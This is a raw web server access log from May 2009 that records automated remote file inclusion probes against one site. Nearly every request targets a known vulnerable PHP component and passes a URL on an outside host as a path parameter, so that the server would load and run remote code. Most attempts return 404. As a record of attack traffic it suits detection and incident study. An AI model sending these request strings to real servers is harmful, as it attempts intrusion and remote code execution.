69.73.164.176 - - [31/May/2009:21:19:18 -0400] "GET /log/sdaglobal.org-access_log.1/?sourcedir=http://shanghaisisa.com/skin/ide.txt?? HTTP/1.1" 404 312
69.73.164.176 - - [31/May/2009:21:19:18 -0400] "GET /?sourcedir=http://shanghaisisa.com/skin/ide.txt?? HTTP/1.1" 200 9432
69.73.164.176 - - [31/May/2009:21:19:19 -0400] "GET /log/?sourcedir=http://shanghaisisa.com/skin/ide.txt?? HTTP/1.1" 200 58358
69.73.164.176 - - [31/May/2009:21:19:27 -0400] "GET /log/sdaglobal.org-access_log.4/?sourcedir=http://shanghaisisa.com/skin/ide.txt?? HTTP/1.1" 404 312
125.247.60.3 - - [31/May/2009:21:25:45 -0400] "GET /log/sdaglobal.org-access_log//?path%5Bdocroot%5D=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 311
125.247.60.3 - - [31/May/2009:21:26:11 -0400] "GET /log/sdaglobal.org-error_log.1//?path%5Bdocroot%5D=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 312
125.247.60.3 - - [31/May/2009:21:27:02 -0400] "GET /log/sdaglobal.org-access_log.4//?path%5Bdocroot%5D=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 313
61.81.93.142 - - [31/May/2009:21:31:35 -0400] "GET //phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://benini.xpg.com.br/Fx29ID1.txt?? HTTP/1.1" 404 342
61.81.93.142 - - [31/May/2009:21:31:35 -0400] "GET /log//phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://benini.xpg.com.br/Fx29ID1.txt?? HTTP/1.1" 404 346
61.81.93.142 - - [31/May/2009:21:31:36 -0400] "GET /log/sdaglobal.org-access_log.1//phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://benini.xpg.com.br/Fx29ID1.txt?? HTTP/1.1" 404 373
61.81.93.142 - - [31/May/2009:21:32:47 -0400] "GET /log/sdaglobal.org-access_log.1%20%20//phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://benini.xpg.com.br/Fx29ID1.txt?? HTTP/1.1" 404 375
67.84.188.50 - - [31/May/2009:21:33:13 -0400] "GET /favicon.ico HTTP/1.1" 404 292
61.81.93.142 - - [31/May/2009:21:35:22 -0400] "GET /log/sdaglobal.org-access_log.3%20%20//phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://benini.xpg.com.br/Fx29ID1.txt?? HTTP/1.1" 404 375
64.6.231.215 - - [31/May/2009:21:37:11 -0400] "GET /log/sdaglobal.org-access_log//include/mail.inc.php?skin_board_path=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 331
64.6.231.215 - - [31/May/2009:21:37:11 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 302
64.6.231.215 - - [31/May/2009:21:37:11 -0400] "GET /log//include/mail.inc.php?skin_board_path=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 306
69.10.135.205 - - [31/May/2009:21:37:27 -0400] "GET /log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 337
69.10.135.205 - - [31/May/2009:21:37:27 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 333
69.10.135.205 - - [31/May/2009:21:37:30 -0400] "GET /log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 337
69.10.135.205 - - [31/May/2009:21:37:31 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 333
222.231.1.87 - - [31/May/2009:21:38:50 -0400] "GET /log/sdaglobal.org-access_log//include/mail.inc.php?skin_board_path=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 331
222.231.1.87 - - [31/May/2009:21:38:50 -0400] "GET /log//include/mail.inc.php?skin_board_path=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 306
222.231.1.87 - - [31/May/2009:21:38:50 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 302
61.81.93.142 - - [31/May/2009:21:38:59 -0400] "GET /log/sdaglobal.org-access_log.4//phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://benini.xpg.com.br/Fx29ID1.txt?? HTTP/1.1" 404 373
69.10.135.205 - - [31/May/2009:21:39:46 -0400] "GET /log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 337
69.10.135.205 - - [31/May/2009:21:39:46 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 333
69.10.135.205 - - [31/May/2009:21:39:46 -0400] "GET /log/sdaglobal.org-access_log.1%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 366
69.10.135.205 - - [31/May/2009:21:39:47 -0400] "GET /log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 337
69.10.135.205 - - [31/May/2009:21:39:47 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 333
69.10.135.205 - - [31/May/2009:21:39:47 -0400] "GET /log/sdaglobal.org-access_log.1%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 366
69.10.135.205 - - [31/May/2009:21:41:16 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 333
69.10.135.205 - - [31/May/2009:21:41:16 -0400] "GET /log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 337
69.10.135.205 - - [31/May/2009:21:41:38 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 333
69.10.135.205 - - [31/May/2009:21:41:38 -0400] "GET /log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 337
69.73.164.176 - - [31/May/2009:21:41:41 -0400] "GET /?sourcedir=http://shanghaisisa.com/skin/ide.txt?? HTTP/1.1" 200 9432
211.203.180.144 - - [31/May/2009:21:43:27 -0400] "GET /?DOCUMENT_ROOT=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 200 9432
211.203.180.144 - - [31/May/2009:21:43:27 -0400] "GET /log/sdaglobal.org-access_log.3/?DOCUMENT_ROOT=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 312
211.203.180.144 - - [31/May/2009:21:43:27 -0400] "GET /log/?DOCUMENT_ROOT=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 200 58358
211.203.180.144 - - [31/May/2009:21:43:40 -0400] "GET /?DOCUMENT_ROOT=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 200 9432
211.203.180.144 - - [31/May/2009:21:43:40 -0400] "GET /log/sdaglobal.org-access_log.3/?DOCUMENT_ROOT=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 312
211.203.180.144 - - [31/May/2009:21:43:40 -0400] "GET /log/?DOCUMENT_ROOT=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 200 58358
211.203.180.144 - - [31/May/2009:21:44:35 -0400] "GET /log/sdaglobal.org-error_log.4/?DOCUMENT_ROOT=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 311
69.10.135.205 - - [31/May/2009:21:44:35 -0400] "GET /log/sdaglobal.org-access_log.1///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 364
211.203.180.144 - - [31/May/2009:21:44:37 -0400] "GET /log/sdaglobal.org-error_log.4/?DOCUMENT_ROOT=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 311
62.146.68.61 - - [31/May/2009:21:45:30 -0400] "GET /log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 337
62.146.68.61 - - [31/May/2009:21:45:30 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 333
62.146.68.61 - - [31/May/2009:21:45:30 -0400] "GET /log/sdaglobal.org-access_log.1///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 364
88.183.32.67 - - [31/May/2009:21:45:36 -0400] "GET /log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 337
62.146.68.61 - - [31/May/2009:21:45:36 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 333
62.146.68.61 - - [31/May/2009:21:45:36 -0400] "GET /log/sdaglobal.org-access_log.1///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 364
62.146.68.61 - - [31/May/2009:21:45:36 -0400] "GET /log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 337
88.183.32.67 - - [31/May/2009:21:45:37 -0400] "GET /log/sdaglobal.org-access_log.1%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 366
62.146.68.61 - - [31/May/2009:21:45:51 -0400] "GET /log/sdaglobal.org-error_log.1///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 363
62.146.68.61 - - [31/May/2009:21:45:59 -0400] "GET /log/sdaglobal.org-error_log.1///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 363
62.146.68.61 - - [31/May/2009:21:47:17 -0400] "GET /log/sdaglobal.org-access_log.1%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 366
62.146.68.61 - - [31/May/2009:21:47:22 -0400] "GET /log/sdaglobal.org-access_log.1%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 366
62.146.68.61 - - [31/May/2009:21:47:22 -0400] "GET /log/sdaglobal.org-error_log.1%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 365
62.146.68.61 - - [31/May/2009:21:47:28 -0400] "GET /log/sdaglobal.org-error_log.1%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 365
218.185.20.88 - - [31/May/2009:21:47:48 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 333
218.185.20.88 - - [31/May/2009:21:47:48 -0400] "GET /log/sdaglobal.org-access_log.1///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 364
218.185.20.88 - - [31/May/2009:21:47:48 -0400] "GET /log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 337
218.185.20.88 - - [31/May/2009:21:47:55 -0400] "GET /log/sdaglobal.org-error_log.1///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 363
123.143.98.5 - - [31/May/2009:21:47:59 -0400] "GET /log/sdaglobal.org-access_log.1//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.itemsnsale.com//js/id1.txt?? HTTP/1.1" 404 356
123.143.98.5 - - [31/May/2009:21:48:00 -0400] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.itemsnsale.com//js/id1.txt?? HTTP/1.1" 404 325
123.143.98.5 - - [31/May/2009:21:48:03 -0400] "GET /log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.itemsnsale.com//js/id1.txt?? HTTP/1.1" 404 329
64.6.231.215 - - [31/May/2009:21:48:13 -0400] "GET /log/sdaglobal.org-access_log%20%20//include/mail.inc.php?skin_board_path=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 333
88.183.32.67 - - [31/May/2009:21:48:52 -0400] "GET /log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 337
88.183.32.67 - - [31/May/2009:21:48:52 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 333
88.183.32.67 - - [31/May/2009:21:48:53 -0400] "GET /log/sdaglobal.org-access_log.1%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 366
123.143.98.5 - - [31/May/2009:21:49:09 -0400] "GET /log/sdaglobal.org-access_log.1//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.itemsnsale.com//js/id1.txt?? HTTP/1.1" 404 356
123.143.98.5 - - [31/May/2009:21:49:11 -0400] "GET /log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.itemsnsale.com//js/id1.txt?? HTTP/1.1" 404 329
123.143.98.5 - - [31/May/2009:21:49:11 -0400] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.itemsnsale.com//js/id1.txt?? HTTP/1.1" 404 325
69.10.135.205 - - [31/May/2009:21:49:29 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 333
69.10.135.205 - - [31/May/2009:21:49:30 -0400] "GET /log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 337
69.10.135.205 - - [31/May/2009:21:49:30 -0400] "GET /log/sdaglobal.org-access_log.1%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 366
123.143.98.5 - - [31/May/2009:21:49:30 -0400] "GET /log/sdaglobal.org-access_log.1%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.itemsnsale.com//js/id1.txt?? HTTP/1.1" 404 358
123.143.98.5 - - [31/May/2009:21:49:44 -0400] "GET /log/sdaglobal.org-access_log.1//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.itemsnsale.com//js/id1.txt?? HTTP/1.1" 404 356
123.143.98.5 - - [31/May/2009:21:49:44 -0400] "GET /log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.itemsnsale.com//js/id1.txt?? HTTP/1.1" 404 329
123.143.98.5 - - [31/May/2009:21:49:44 -0400] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.itemsnsale.com//js/id1.txt?? HTTP/1.1" 404 325
69.10.135.205 - - [31/May/2009:21:50:00 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 333
69.10.135.205 - - [31/May/2009:21:50:00 -0400] "GET /log/sdaglobal.org-access_log.1///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 364
69.10.135.205 - - [31/May/2009:21:50:00 -0400] "GET /log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 337
69.10.135.205 - - [31/May/2009:21:50:01 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 333
69.10.135.205 - - [31/May/2009:21:50:01 -0400] "GET /log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 337
69.10.135.205 - - [31/May/2009:21:50:01 -0400] "GET /log/sdaglobal.org-access_log.1///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 364
69.10.135.205 - - [31/May/2009:21:50:13 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 333
69.10.135.205 - - [31/May/2009:21:50:13 -0400] "GET /log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 337
69.10.135.205 - - [31/May/2009:21:50:13 -0400] "GET /log/sdaglobal.org-access_log.1%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 366
218.185.20.88 - - [31/May/2009:21:50:13 -0400] "GET /log/sdaglobal.org-error_log.1%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 365
218.185.20.88 - - [31/May/2009:21:50:19 -0400] "GET /log/sdaglobal.org-access_log.1%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 366
69.10.135.205 - - [31/May/2009:21:50:23 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 333
69.10.135.205 - - [31/May/2009:21:50:23 -0400] "GET /log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 337
69.10.135.205 - - [31/May/2009:21:50:23 -0400] "GET /log/sdaglobal.org-access_log.1///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 364
69.10.135.205 - - [31/May/2009:21:50:23 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 333
69.10.135.205 - - [31/May/2009:21:50:23 -0400] "GET /log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 337
69.10.135.205 - - [31/May/2009:21:50:24 -0400] "GET /log/sdaglobal.org-access_log.1///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 364
85.10.128.219 - - [31/May/2009:21:50:46 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 335
85.10.128.219 - - [31/May/2009:21:50:49 -0400] "GET /log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 339
85.10.128.219 - - [31/May/2009:21:51:12 -0400] "GET /log/sdaglobal.org-access_log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 366
123.143.98.5 - - [31/May/2009:21:51:17 -0400] "GET /log/sdaglobal.org-access_log.1%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.itemsnsale.com//js/id1.txt?? HTTP/1.1" 404 358
212.158.128.62 - - [31/May/2009:21:51:37 -0400] "GET /log/sdaglobal.org-access_log.1///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://xshellbrx.by.ru/evalx.txt??? HTTP/1.1" 404 364
212.158.128.62 - - [31/May/2009:21:51:37 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://xshellbrx.by.ru/evalx.txt??? HTTP/1.1" 404 333
212.158.128.62 - - [31/May/2009:21:51:38 -0400] "GET /log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://xshellbrx.by.ru/evalx.txt??? HTTP/1.1" 404 337
69.10.135.205 - - [31/May/2009:21:52:20 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 333
69.10.135.205 - - [31/May/2009:21:52:20 -0400] "GET /log/sdaglobal.org-access_log.1///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 364
69.10.135.205 - - [31/May/2009:21:52:20 -0400] "GET /log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 337
69.10.135.205 - - [31/May/2009:21:52:31 -0400] "GET /log/sdaglobal.org-access_log.1///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 364
69.10.135.205 - - [31/May/2009:21:52:31 -0400] "GET /log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 337
69.10.135.205 - - [31/May/2009:21:52:31 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 333
218.185.20.88 - - [31/May/2009:21:52:43 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 333
218.185.20.88 - - [31/May/2009:21:52:43 -0400] "GET /log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 337
218.185.20.88 - - [31/May/2009:21:52:43 -0400] "GET /log/sdaglobal.org-access_log.1%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 366
218.185.20.88 - - [31/May/2009:21:52:57 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 333
218.185.20.88 - - [31/May/2009:21:52:57 -0400] "GET /log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 337
218.185.20.88 - - [31/May/2009:21:52:57 -0400] "GET /log/sdaglobal.org-access_log.1%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 366
123.143.98.5 - - [31/May/2009:21:53:10 -0400] "GET /log/sdaglobal.org-access_log.1%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.itemsnsale.com//js/id1.txt?? HTTP/1.1" 404 358
